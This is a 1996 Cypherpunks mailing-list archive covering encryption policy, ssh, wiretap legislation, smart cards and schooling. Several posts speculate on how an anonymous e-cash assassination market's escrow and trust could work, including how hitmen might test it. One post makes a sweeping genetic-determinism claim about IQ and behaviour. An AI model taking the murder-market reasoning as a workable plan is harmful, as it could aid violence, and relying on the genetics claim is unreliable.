To: cypherpunks@toad.com
Subject: a comment on AP vs. more peaceful resistance...
Message-ID: <Pine.SOL.3.93.960926222625.3799A-100000@stiletto.acadian.net>
MIME-Version: 1.0
Content-Type: text/plain



You know, it occured to me earlier that all of this AP stuff flooding
the list is overlooking one thing about cryptography: in a way, its
use and dissemination represents to some people a means of nonviolent
protest.

Comments, anyone?

Phil Fraering          The above is the opinion of neither my internet
pgf@acadian.net        service provider nor my employer.
318/261-9649               





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Timothy C. May" <tcmay@got.net>
Date: Fri, 27 Sep 1996 16:14:40 +0800
To: cypherpunks@toad.com
Subject: Re: Is "Black Unicorn" a lawyer, or just a nym used by a lawyer?
In-Reply-To: <199609270017.RAA18940@dfw-ix7.ix.netcom.com>
Message-ID: <v03007800ae71249768b1@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain


At 5:17 PM -0700 9/26/96, Bill Stewart wrote:

>Tim's signature file no longer asserts that he's a Licensed Ontologist,
>but this seems to be the kind of question you'd ask a L.O. if you knew one.
>

Yeah, I got some "What's an ontologist?" questions. One person I told to
look it up in a dictionary. Then he came back with a "OK, so I looked it
up. Why's a license needed?"

(I also got two responses asking why I was talking about cancer.)

--Tim


We got computers, we're tapping phone lines, I know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^1,257,787-1 | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@cypherpunks.ca (John Anonymous MacDonald)
Date: Fri, 27 Sep 1996 16:23:29 +0800
To: cypherpunks@toad.com
Subject: Re: ssh - How widely used?
In-Reply-To: <Pine.SUN.3.94.960926174203.498E-100000@polaris>
Message-ID: <199609270615.XAA15801@abraham.cs.berkeley.edu>
MIME-Version: 1.0
Content-Type: text/plain


> Looks like a nice little implementation.
> 
> Comments anyone?

Yup.  Really nifty package that has been out (for unix) for about a
year.  Unfortunately, the author is turning it into a commerial
product, so it may not be freely available in the future.  There is
now a Windows port, but it is entirely a commecial product.  Source is
not available.

Though ssh is on the whole a nifty product, the unix version contained
a number of nasty implementation bugs that opened large security
holes.  These were found because source code was made available.  I
wouldn't trust the Windows version.  It seems inevitable that there
will be some bugs in it, but unlike the Unix version, "good guys" are
a lot less likely to find and report them.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Chad Dougherty <chad@lycos.com>
Date: Fri, 27 Sep 1996 13:28:02 +0800
To: Black Unicorn <unicorn@schloss.li>
Subject: Re: ssh - How widely used?
In-Reply-To: <Pine.SUN.3.94.960926174203.498E-100000@polaris>
Message-ID: <324B490B.4016@lycos.com>
MIME-Version: 1.0
Content-Type: text/plain


Black Unicorn wrote:
> 
> Does anyone know if there are MS-Dos or Mac versions of the ssh client?
> How much is ssh used?
> 

Secure shell is an amazing package.  Get it immediately.  There are no
DOS or Mac versions, but there is one for windows.  We use it here
almost exclusively.

-- 
Chad Dougherty
Lycos, Inc.  "The Catalog of the Internet"
http://www.lycos.com
Phone: (412)261-6660x226
Email: chad@lycos.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Timothy C. May" <tcmay@got.net>
Date: Fri, 27 Sep 1996 17:04:57 +0800
To: cypherpunks@toad.com
Subject: Escrow Services
In-Reply-To: <Pine.SUN.3.91.960926165048.8310C-100000@eff.org>
Message-ID: <v03007800ae71313370cd@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain


At 12:21 AM -0400 9/27/96, Simon Spero wrote:
>On Thu, 26 Sep 1996, Declan McCullagh wrote:
>
>> Anonymity and nonescrowed crypto are the linchpins of AP and its more
>> general case, Maysian crypto anarchy. The withering of the nation-state.
>
>If I might dare a crypto-related comment as well; it also requires an
>absolutely trusted third-party to manage the funds and issue the ecash
>used to pay the murderer, (sorry, fortunate gambler).  The reason why the
>third party must be trusted by both the payers and the gambler, and thus
>cannot be anonymous (only at 'best' pseduonymous) should be obvious.

Do you consider an entity such as "Joe's Escrow--You Slay, We Pay" with an
untraceable BlackNet identity to be "anonymous" or "pseudonymous"? I'd say
it can be made "untraceable," but with a persistent name and reputation.

How does an escrow service (and I mean the classical definition of escrow,
not the newspeak definition used by the U.S. government) survive and
prosper?

By being in the business of releasing funds when conditions are met, and
not otherwise. By not absconding with the funds.

Note that in the real world, escrow services do quite well, because the
continuing future revenue stream from their good reputation exceeds what
they could get by "burning" any particular customer. (Sometimes by putting
up a bond, which is a kind of secondary escrow. Also, escrow services can
be "pinged" (tested) by lots of small transactions. (A lot of similarities
between digital escrow services and digital banks.)

(For more on this--a lot more--see the "escrow" entries in my Cyphernomicon.)

--Tim May



We got computers, we're tapping phone lines, I know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^1,257,787-1 | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Voters Telecommunications Watch <shabbir@vtw.org>
Date: Fri, 27 Sep 1996 14:39:00 +0800
To: cypherpunks@toad.com
Subject: INFO: Netscape CEO Jim Barksdale signs the pro-crypto petition! (9/26/96)
Message-ID: <199609270416.AAA07147@panix3.panix.com>
MIME-Version: 1.0
Content-Type: text/plain


=============================================================================
          ____                  _              _   _
         / ___|_ __ _   _ _ __ | |_ ___       | \ | | _____      _____
        | |   | '__| | | | '_ \| __/ _ \ _____|  \| |/ _ \ \ /\ / / __|
        | |___| |  | |_| | |_) | || (_) |_____| |\  |  __/\ V  V /\__ \
         \____|_|   \__, | .__/ \__\___/      |_| \_|\___| \_/\_/ |___/
                    |___/|_|

      MORE NET LUMINARIES JOIN THOUSANDS IN SIGNING PRO-ENCRYPTION PETITION
		       http://www.crypto.com/petition/
                   JUDICIARY HEARING ON HR 3011 (9/25/96)

                          Date: September 25, 1996

         URL:http://www.crypto.com/            crypto-news@panix.com
           If you redistribute this, please do so in its entirety,
                         with the banner intact.
-----------------------------------------------------------------------------
Table of Contents
        Introduction
        Join Netscape CEO Jim Barksdale as he signs the pro-crypto petition!
        How to receive crypto-news
        Press contacts

-----------------------------------------------------------------------------
INTRODUCTION

This is a busy last few days for Washington.  In the midst of it all,
the Judiciary committee held a hearing HR 3011, beginning the process of
educating Congress for next year, and bringing in the Administration for
a regular public drubbing about their antiquated encryption regulations.

The very same day, WWW.Crypto.Com was honored to have Netscape CEO Jim
Barksdale sign onto petition that supports legislation that would:

	-Relax export controls on encryption technology; 
	-Prohibit the government from imposing "Key Escrow" solutions
	 domestically; and 
	-Recognize the importance of privacy and security for the future
	 of electronic commerce, individual liberty, and the success of the
	 Internet. 

Jim Barksdale is no stranger to the encryption debate.  He testified
at the July 25th hearing on the pro-encryption Pro-CODE bill (S1726).
You can hear him in his own words by listening to the RealAudio transcript
of the hearing cybercast at http://www.crypto.com/events/072596/

We'll be continuing the petition throughout the break and the election
and use it next year to support the encryption legislation that will
surely be introduced again.

Be a part of it by signing the petition with Jim Barksdale at
http://www.crypto.com/petition/  !

-----------------------------------------------------------------------------
JOIN NETSCAPE CEO JIM BARKSDALE IN FIGHTING FOR YOUR PRIVACY!

The following petition can be signed onto at http://www.crypto.com/petition/

	The Information Revolution is being held hostage by an
	outdated, Cold War-era U.S. encryption policy.

	Current U.S. export controls and other initiatives are slowing
	the widespread availability of strong encryption products,
	endangering the privacy and security of electronic
	communications, harming the competitiveness of U.S. businesses,
	and threatening the future of electronic commerce and the
	growth of the Global Information Infrastructure (GII).

	We the undersigned Internet users and concerned citizens
	strongly support Congressional efforts to address this critical
	issue. Bills are currently pending in both Houses of Congress
	which would:

	-Relax export controls on encryption technology;
	-Prohibit the government from imposing "Key Escrow" solutions
	 domestically; and
	-Recognize the importance of privacy and security for the future of
	 electronic commerce, individual liberty, and the success of the
	 Internet.

	We urge Congress to act NOW to enact a U.S. encryption policy that
	promotes electronic privacy and security.


Add your name to his at http://www.crypto.com/petition/  !

-----------------------------------------------------------------------------
HOW TO RECEIVE CRYPTO-NEWS

To subscribe to crypto-news, sign up from our WWW page (http://www.crypto.com)
or send mail to majordomo@panix.com with "subscribe crypto-news" in the body
of the message.  To unsubscribe, send a letter to majordomo@panix.com with
"unsubscribe crypto-news" in the body.
-----------------------------------------------------------------------------
PRESS CONTACT INFORMATION

Press inquiries on Crypto-News should be directed to
	Shabbir J. Safdar (VTW) at +1.718.596.2851 or shabbir@vtw.org
	Jonah Seiger (CDT) at +1.202.637.9800 or jseiger@cdt.org

-----------------------------------------------------------------------------
End crypto-news
=============================================================================






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Simon Spero <ses@tipper.oit.unc.edu>
Date: Fri, 27 Sep 1996 15:03:26 +0800
To: Declan McCullagh <declan@eff.org>
Subject: Re: Hallam-Baker demands more repudiations or he'll write!
In-Reply-To: <Pine.SUN.3.91.960926165048.8310C-100000@eff.org>
Message-ID: <Pine.SUN.3.91.960927001545.5983A-100000@tipper.oit.unc.edu>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 26 Sep 1996, Declan McCullagh wrote:

> Anonymity and nonescrowed crypto are the linchpins of AP and its more 
> general case, Maysian crypto anarchy. The withering of the nation-state. 

If I might dare a crypto-related comment as well; it also requires an
absolutely trusted third-party to manage the funds and issue the ecash 
used to pay the murderer, (sorry, fortunate gambler).  The reason why the 
third party must be trusted by both the payers and the gambler, and thus 
cannot be anonymous (only at 'best' pseduonymous) should be obvious.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Jean-Francois Avon" <jf_avon@citenet.net>
Date: Fri, 27 Sep 1996 15:18:08 +0800
To: Declan McCullagh <declan@eff.org>
Subject: Re: Hallam-Baker demands more repudiations or he'll write!
Message-ID: <9609270422.AA06397@cti02.citenet.net>
MIME-Version: 1.0
Content-Type: text/plain


On 26 Sep 96 at 16:51, Declan McCullagh wrote:

> Anonymity and nonescrowed crypto are the linchpins of AP and its
> more general case, Maysian crypto anarchy. The withering of the
> nation-state. Whatever you want to call it.
> 
> To prevent it, governments will ban both. A criminal law, passed in
> the wake of say a bombing this fall in Washington, DC, banning
> nonescrowed crypto. (Freeh will assert he has evidence the
> terrorists used PGPhone.) And another law banning online anonymity. 

I agree with the prediction but the cause will probably not be AP.  
AP could probably be run from BBS and direct link over a very 
informal and loose network made out of individual modem connections.  
I think it is very unlikely it would get succesfully stopped.  It 
could even be run from physically exchanged diskettes.  It would run 
slowly, but still, it would run.

OTOH, the "Maysian" crypto anarchy will be a much more immediate
problem to govts.  "L'argent est le nerf de la guerre",or, loosely
translated:  "money is war's fuel" as we say...  When they start 
getting financially starved, they'll have to increase taxation but 
the population already have them in very low esteem...

AP, with a properly structured media campaing, will make govts
heroes, Maysian anarchy will make them seen as looters.

Did I put my foot in my mouth again?

> What then, Mr. Bell?
> 
> -Declan

> // declan@eff.org // I do not represent the EFF // declan@well.com
Jean-Francois Avon, Montreal QC Canada
 DePompadour, Societe d'Importation Ltee
    Finest Limoges porcelain and crystal
 JFA Technologies, R&D consultant
    physicists and engineers, LabView programming
PGP keys at: http://w3.citenet.net/users/jf_avon
ID# C58ADD0D : 529645E8205A8A5E F87CC86FAEFEF891 
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jya@pipeline.com (John Young)
Date: Fri, 27 Sep 1996 13:03:45 +0800
To: cypherpunks@toad.com
Subject: Re: CWD--Wiretap In the Night
Message-ID: <199609270024.AAA25881@pipe2.ny2.usa.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   Adding to the CWD wiretap alarm by Brock and Declan: 
 
 
   The Washington Post, September 26, 1996, p. A30. 
 
 
   Wiretaps and Money Bills [Editorial] 
 
 
   Legislators who have pet projects but not enough support to 
   get them passed have a way of turning desperate during the 
   closing days of the congressional session. Their thoughts 
   turn ineluctably to unrelated appropriations bills. Only 
   last week, Rep. Frank Wolf used the transportation funding 
   bill as a vehicle for usurping the courts' role in a 
   specific domestic relations dispute. Now senators working 
   on the Commerce, State and Justice appropriations bill have 
   slipped in provisions relating to wiretaps that have been 
   before the Congress for 18 months but have not been 
   adopted. The law should not be changed by means of these 
   stealthy riders. 
 
   One of the substantive changes in the criminal laws ordered 
   by the money committee, for example, would make it easier 
   to obtain court orders authorizing "roving" wiretaps. This 
   would permit putting taps on any phone a suspect might use 
   -- including unspecified public phones -- without 
   requiring, as the law now does, that the government show 
   that the suspect is attempting to thwart a home or office 
   tap by repeatedly changing phones. This may or may not be 
   reasonable, but Congress considered and rejected it earlier 
   this year. It shouldn't be shoved through on an 
   appropriations bill. 
 
   The committee bill also increased the number of crimes for 
   which a wiretap can be issued, adding a list of new, 
   relatively imprecise offenses related to terrorism such as 
   "providing material support to terrorists" and "terrorist 
   acts transcending national borders." Taps already are 
   allowed for just about every major crime in which a 
   terrorist might engage, including bombing, arson, murder, 
   kidnapping, extortion, espionage, sabotage, treason, 
   hostage-taking and the destruction of trains ships, 
   aircraft and aircraft facilities. What, then, is the reason 
   for adding these new elastic terms, which could include far 
   less serious offenses that someone thinks might be linked 
   to terrorism? The committees that dealt with the subject in 
   April did not see fit to do so. Why now has the 
   Appropriations Committee intervened? 
 
   The competing values of security and privacy rights require 
   a much better sorting out. It's best done by people who 
   have had the benefit of relevant testimony and experience. 
   The appropriations committees are the wrong setting to deal 
   with such questions, which should not be presented in a 
   take-it-or-leave-it package with the government's continued 
   operation at stake. 
 
   [End] 
 
 
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Jean-Francois Avon" <jf_avon@citenet.net>
Date: Fri, 27 Sep 1996 14:40:47 +0800
To: snow <snow@smoke.suba.com>
Subject: Re: Hallam-Baker demands more repudiations or he'll write!
Message-ID: <9609270430.AA06876@cti02.citenet.net>
MIME-Version: 1.0
Content-Type: text/plain


On 26 Sep 96 at 20:46, snow wrote:

>      Having been a firefighter for about 4 years, I can say that for
>      
> small fires water works quite a bit better. For larger fires (over a
> hundred acres or so) setting a backfire, or burning out the fuel in
> the direction the fire is probably going to go is a hell of a lot
> easier than hauling millons and millions of gallons or
> blood^h^h^h^h^h water.
> 
> Petro, Christopher C.
> petro@suba.com <prefered for any non-list stuff>
> snow@smoke.suba.com

Well, let's not debate over firefighting, a lousy analogy...

As long as Canadair sells water bombers, let them do.  It brings 
money to Montreal...

:)

As for Jim Bell, he would probably say that he just proposes to use 
your techniques. :)

jfa




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Jean-Francois Avon" <jf_avon@citenet.net>
Date: Fri, 27 Sep 1996 15:28:24 +0800
To: Simon Spero <ses@tipper.oit.unc.edu>
Subject: Re: Hallam-Baker demands more repudiations or he'll write!
Message-ID: <9609270443.AA07590@cti02.citenet.net>
MIME-Version: 1.0
Content-Type: text/plain


On 27 Sep 96 at 0:21, Simon Spero wrote:

> On Thu, 26 Sep 1996, Declan McCullagh wrote:
> 
> > Anonymity and nonescrowed crypto are the linchpins of AP and its
> > more general case, Maysian crypto anarchy. The withering of the
> > nation-state. 
> 
> If I might dare a crypto-related comment as well; it also requires
> an absolutely trusted third-party to manage the funds and issue the
> ecash used to pay the murderer, (sorry, fortunate gambler).  The
> reason why the third party must be trusted by both the payers and
> the gambler, and thus cannot be anonymous (only at 'best'
> pseduonymous) should be obvious.

For the payer, the ammount involved is so small that he might thing
it is worth a shot to put the price of two bottles of beer "just in
case" it works.  As the system gets known, it'll gain reputation.

For the hitman, this is another story, but there is a way.  AP, a
sensationalistically choosen name (No, Jim, I know... you intended
it only as a joke) very badly describes what the server does.

It could accept donations for all sorts of things, many of them
being legally unconsequential.  So, a potential hitman group could
make donations for anybody who would predict any kind of event and
see if they would pay.  The server could not even know if these
would be integrity tests or legitimate donations. 

IMO, there is only one way to prevent AP: it is by preventing the 
advent of e-cash.  Making it illegal to issue such currency, and 
seize and prosecute heavily if any of it is found.  This would 
includes, of course, gold (or other material value) e-tokens, etc.  
It will come from a total control of money.  Can it be done?  I doubt 
it very stronly.

jfa
Did you give away a copy of PGP to a friend today?

Please Cc me any reply, I am not on Cypherpunks anymore.  Thanks.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jya@pipeline.com (John Young)
Date: Fri, 27 Sep 1996 12:23:31 +0800
To: cypherpunks@toad.com
Subject: NISSC
Message-ID: <199609270103.BAA27705@pipe2.ny2.usa.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


The National Information Systems Security Conference in Baltimore on
October 22-25 is bountifully described at: 
 
 
     http://csrc.nist.gov/nissc/program 
 
 
Section No. 10, Solutions, will interest those who want a peek at what the
Puzzle Palace gang is up to. 
 
 
The other nine sessions cover everything the info-sec gov-biz wants to do
to make the infoworld safe from everyone except them. 
 
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dale Thorn <dthorn@gte.net>
Date: Fri, 27 Sep 1996 19:04:12 +0800
To: "James A. Donald" <jamesd@echeque.com>
Subject: Re: Public Schools
In-Reply-To: <199609270229.TAA03286@dns2.noc.best.net>
Message-ID: <324B9008.17A4@gte.net>
MIME-Version: 1.0
Content-Type: text/plain


James A. Donald wrote:
> Phil Fraering <pgf@acadian.net> writes:
> >> > Without vouchers, you don't say anything about the intelligence 
> >> > of
> >> > your test subjects; to a _very_ large degree, intelligence isn't
> >> > genetic. Or

> Bag of shit wrote:
> >> That's the political correct thing to say, but do you have any
> >> scientific evidence to support this claim?

> At 11:19 PM 9/25/96 -0700, Dale Thorn wrote:
> > People have argued for genetic disposition to certain things, and I
> > think they are sometimes (most times?) confused [...]
> [Lots of meaningless hand waving hot air deleted]
> 
> The key basic test of the power of genes is studies of identical
> twins raised in different families.
> They have near identical IQ's, and a wide range of
> very similar behavior.
> Identical twins raised in different families are more
> similar than identical twins raised in the same family,
> probably because of deliberate attempts to differentiate
> themselves.
> Except in the case of extreme environmental pressures --
> starvation, neglect, and the like, genes count for
> just about everything, and environment for almost
> nothing.

Please excuse my bluntness, but you obviously get your info out of a 
book, whereas I get mine from actual experience, which I can demonstrate 
quite well.  Your identical twins example means nothing, as it's totally 
likely that: 1) Few identical twins separated early are really available 
for study and  2) Far fewer yet would have a substantially different 
environment awaiting them.  This is one test you'd certainly have to do 
purposely (separating them, that is).

Your testimonial of IQ's is equally dubious, excepting you should come 
up with a test that measures actual intelligence.

The "wide range of similar behavior" puts the torch to your argument.
If you want to argue that the twins would grow nearly always to the same 
height, I could allow that (but still argue the point), but behavior?
Please!





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hallam-Baker <hallam@ai.mit.edu>
Date: Fri, 27 Sep 1996 16:21:31 +0800
To: cypherpunks@toad.com
Subject: Re: Weaknesses in Smart Cards? (Re: FLA_wed)
In-Reply-To: <52fcje$6ib@life.ai.mit.edu>
Message-ID: <324B6D5E.167E@ai.mit.edu>
MIME-Version: 1.0
Content-Type: text/plain


Its worse than that. The Bellcore piece was presented as being
about a possible weakness in MONDEX. In fact MONDEX does not use the
cryptographic technique investigated. Its a symmetric key (DES)
based system. I would immagine they would keep a symmetric 
component even if they go for a public key system.

BTW if you think carefully about MONDEX you will note that a
public key system does not improve security. The system 
depends on private keys embedded in the devices. There is
no value in having the devices use public key signatures over 
symetric ones.

	Phill

PS whats the betting that anyone at a high profile site who
happens to be offline for a few hours to (say) change 
service providers will be reported as having been "hacked"?




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Chad Dougherty <chad@lycos.com>
Date: Fri, 27 Sep 1996 16:35:10 +0800
To: Adam Shostack <adam@homeport.org>
Subject: Re: ssh - How widely used?
In-Reply-To: <Pine.SUN.3.94.960926174203.498E-100000@polaris>
Message-ID: <199609270608.CAA24129@rat.eng.lycos.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Adam Shostack writes:
 > 	Theres a windows version, mac is under vauge development.  SSH
 > is pretty cool, but the code base is somewhat messy, and its shows
 > signs of its origins in things like systems calls not having their
 > return values checked.
 > 
 > 	Despite all this, I use it, like it, and recomend it for use
 > in systems not likely to come under attack by professionals.
 > 
 > Adam
 > 

Why do you say "not likely to come under attack by professionals"?
Have you found security holes in it?

	-Chad

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Processed by Mailcrypt 3.3, an Emacs/PGP interface

iQCVAwUBMktvVTa/vRyBMxWdAQGRsAP+PbjVCYB0FrNTY6CUCH/D5BZ02gczvMzQ
1kdlf7Lcx+GcyAosaJXgovJpA/UcIq/ShIELtuvZQNqB3JVLCL3RvYbQ0vf5o6wI
QEnL5gS8uEetr2C7U/Pt2lqkwv0PTQYv/O7uKjVFAd36p0aRrbQJOkX6LpKNbbYi
oDk5B9XgbK4=
=4aWj
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: geeman <geeman@best.com>
Date: Fri, 27 Sep 1996 19:44:05 +0800
To: Alan Olsen <alano@teleport.com>
Subject: Re: Tamper-Resistant Software from INTEL
In-Reply-To: <3.0b16.32.19960926211900.00b94b20@mail.teleport.com>
Message-ID: <324BA226.8E1@best.com>
MIME-Version: 1.0
Content-Type: text/plain


> 
> It means that if you do *ANYTHING* to try and adjust, modify, and/or
> configure the software, it no longer functions.  Sadly, Microsoft has beat
> them to the punch on this technology.
> 
>

As far as I know, it has raised the bar, so to speak, but
that's all.  It may have raised it pretty far, but as we
know there's nothing you can't do on untrustable hardware.
Which Microsoftware are you referring to, BTW?

gee.
man.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: attila <attila@primenet.com>
Date: Fri, 27 Sep 1996 15:53:29 +0800
To: Bill Stewart <cypherpunks@toad.com
Subject: Re: Is "Black Unicorn" a lawyer, or just a nym used by a lawyer?
In-Reply-To: <199609270017.RAA18940@dfw-ix7.ix.netcom.com>
Message-ID: <199609270540.XAA21446@InfoWest.COM>
MIME-Version: 1.0
Content-Type: text/plain


In <199609270017.RAA18940@dfw-ix7.ix.netcom.com>, on 09/26/96 
   at 05:17 PM, Bill Stewart <stewarts@ix.netcom.com> said:

= .Tim May said, in a discussion on another topic
= .        While BU is a lawyer, and I am not, I maintain
= .        [........]
= .Is it correct to say that "Black Unicorn is a lawyer", or only that
= .the nym "Black Unicorn" is used by a person who's a lawyer under
= .another name?  "Black Unicorn" at least doesn't appear to be a
= ._practicing lawyer_, though maybe [name used for legal work by
= .person who also uses nym "Black Unicorn"] is a practicing lawyer.

= .Tim's signature file no longer asserts that he's a Licensed
= .Ontologist, but this seems to be the kind of question you'd ask a
= .L.O. if you knew one.  

        we've gone around more than once on this topic in the past few
    years.  tim either knows exactly who NU is, or has it narrowed to
    a very short list.  Someone else actually met BU maybe a year ago.
    there are other indications.

        BU claims association with a given location of which I am 
    _very_  familiar. the crest belongs to a specific lineage, of
    which I have a direct connection to about 300 years ago. 

        BU has a past "life," I have a past "life," and the two are
    related --but you will not "hear" the "truth," calling it 
    "fiction," anyway.

        BU is a lawyer.  and he has done a _great_ deal more with his
    degree than I, who refused to practice in the U.S. Is BU currently
    a practicing lawyer? does it matter?

        BU is extremely well researched, and current. I suspect BU
    deals primarily with accounting, funding, and assets management,
    the details of which are irrelevant.  If I needed a solid opinion,

    backed by existing law cites, and conflicting decisions, I would 
    trust BU --and, I am plenty fiesty,   need I say more?
 
        I do not have a "need to know" BU's "real name" any more
    than BU or anyone else needs to know mine.  I think we could
    find each others with a few phone calls were it to be necessary,
    or one party asked.... 

        Reality is what you make of it...   and, if curiosity says the
    cat wishes to give up one life, ask tcm; I think he knows both 
    names.

        'nuff said?




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@homeport.org>
Date: Fri, 27 Sep 1996 22:00:39 +0800
To: chad@lycos.com (Chad Dougherty)
Subject: Re: ssh - How widely used?
In-Reply-To: <199609270608.CAA24129@rat.eng.lycos.com>
Message-ID: <199609271217.HAA07612@homeport.org>
MIME-Version: 1.0
Content-Type: text


I have not found security holes in ssh-1.2.14, which is the version
I've looked at most in depth.

However, I have found things that are disquieting, and as such assume
that clever professionals with time available might be able to exploit
something.

	'Standard' hackers with toolkits are likely to move to the
next site.

Adam


Chad Dougherty wrote:

| Adam Shostack writes:
|  > 	Theres a windows version, mac is under vauge development.  SSH
|  > is pretty cool, but the code base is somewhat messy, and its shows
|  > signs of its origins in things like systems calls not having their
|  > return values checked.
|  >
|  > 	Despite all this, I use it, like it, and recomend it for use
|  > in systems not likely to come under attack by professionals.
|  >
|  > Adam
|  >
| 
| Why do you say "not likely to come under attack by professionals"?
| Have you found security holes in it?
| 
| 	-Chad


-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Declan McCullagh <declan@well.com>
Date: Sat, 28 Sep 1996 02:09:00 +0800
To: cypherpunks@toad.com
Subject: Columbian guerrillas get kicked off of the Net
Message-ID: <Pine.GSO.3.95.960927072539.6804F-100000@well.com>
MIME-Version: 1.0
Content-Type: text/plain




---------- Forwarded message ----------
Date: Fri, 27 Sep 1996 07:25:03 -0700 (PDT)
From: Declan McCullagh <declan@well.com>
To: fight-censorship@vorlon.mit.edu
Subject: Columbian guerrillas get kicked off of the Net

[Perhaps it's time to mirror the Columbian guerrillas' home page?
Volunteers, anyone? (I wonder what the British, had the Internet
existed in 1776, would have done to muzzle the colonial rebels' web
sites -- which would have called for a violent overthrow of the
government. Perhaps the founding fathers' home pages would have been
copied and mirrored in France?) --Declan]

*********

   Colombia censors guerilla home page
   By Reuters     
   September 26, 1996, 4:15 p.m. PT        
              
   A Colombian guerrilla group currently involved in a bloody offensive
   in the mountains and jungles, suffered a setback in its propaganda   
   battle when its new voice on the Internet was mysteriously silenced.
   
   The Revolutionary Armed Forces of Colombia (FARC), which has       
   periodically paralyzed half the country with road blocks, found its
   route to the information superhighway barred.
   
   The Communist insurgents, who rose up in arms in 1964, embraced new   
   technology last year in their fight to overthrow the government by
   launching a home page on the Internet.
   
   "Using weapons naturally comes within the logic of the armed struggle.
   Just fighting through the Internet would be like shooting rubber      
   bullets. Not using it would be like continuing to fight the army with
   a 12-bore shotgun," said Marco LeDon CalarcDa, the FARC's Mexico
   City-based international spokesman.
   
   But in unexplained circumstances, which a spokeswoman for the Mexico  
   City-based Internet provider Teesnet said may or may not be linked to
   external pressures, the plug was pulled on the service Monday--a day
   after being publicized in Colombia's leading daily, El Tiempo.
   CalarcDa admitted the loss of the Internet page was a serious reversal
   but vowed the computer-age conflict was far from over.

[...]
             
   The Colombian guerrillas used their Web site to publish their
   political magazine Resistencia, whose distribution is banned in
   Colombia, and to offer explanations about their latest armed actions.
              
   FARC, labeled narcoguerrillas since the 1980s when U.S. ambassador
   Lewis Tambs highlighted the group's alleged connections with
   Colombia's drugs trade, have been dubbed cyberspace guerrillas since
   their appearance on the Internet.
        
   "Cyberspace guerrillas may seem a fun name but I think it is
   pejorative and belittles what we're doing," said LeDon CalarcDa. "We
   are looking to topple the government and set up a new Colombia.
                     
   In the four weeks since the FARC unleashed its latest offensive with
   an attack on a jungle base in southern Putumayo province, more than
   150 soldiers, police, and civilians have died.
   
###








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim McCoy <mccoy@communities.com>
Date: Sat, 28 Sep 1996 09:43:15 +0800
To: cypherpunks@toad.com
Subject: [NOISE] Re: Public Schools
In-Reply-To: <324BD4FD.3372@unidial.com>
Message-ID: <v03007803ae71a702ff26@[205.162.51.35]>
MIME-Version: 1.0
Content-Type: text/plain


Lsurfer@cris.com (Randy Bradakis) wrote:
>The human formerly known as "ronsimpson <ronsimpson@unidial.com>" wrote:
>{I hate to burst any bubbles but, the school with the highest number of
>{National Merit Finalists and highest number of 1600 SATs is a Public
>{High School (Jefferson High in Fairfax, VA)
>
>Er, how about the schools with the highest percentages, not the largest
>number?  A public school will most certainly have more students than
>home schools or private schools.

Well, even then you are probably going to have a tough time making your
argument.  Public "magnet" schools and other public schools which target
the top flight students in major metropolitan areas will usually have a
very high percentage of such students because they are able to "cherry pick"
the ones they want (and avoid dragging down averages with students whose
parents have "pull" that some private schools must deal with.)  If you take
the percentages for a school district or other large geographic area which
covers several schools you will probably end up with a better comparison.

Then again, even with such a geographic comparison you may not end up with
the results you seem to want.  In certain areas of the US the public schools
are excellent (generally the Midwest judging from published surveys of test
results and other somewhat meaningless tests :) and in some ares the public
schools are horrific.  Making broad claims regarding which types of
education are good and which are bad is often a fools errand....

jim







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: geeman <geeman@best.com>
Date: Sat, 28 Sep 1996 02:43:58 +0800
To: cypherpunks@toad.com
Subject: [Fwd: Email Robot draws fire from CypherPunkz]
Message-ID: <324BF794.801@somewhere.gov>
MIME-Version: 1.0
Content-Type: message/rfc822


Subject: Email Robot draws fire from CypherPunkz
From: dlv@bwalk.dm.com (Dr. Dimitri Vulis)
Date: Sat, 14 Sep 96 20:56:38 EDT
Expires: 14 Sep 99 20:56:38 EDT
Followup-to: poster
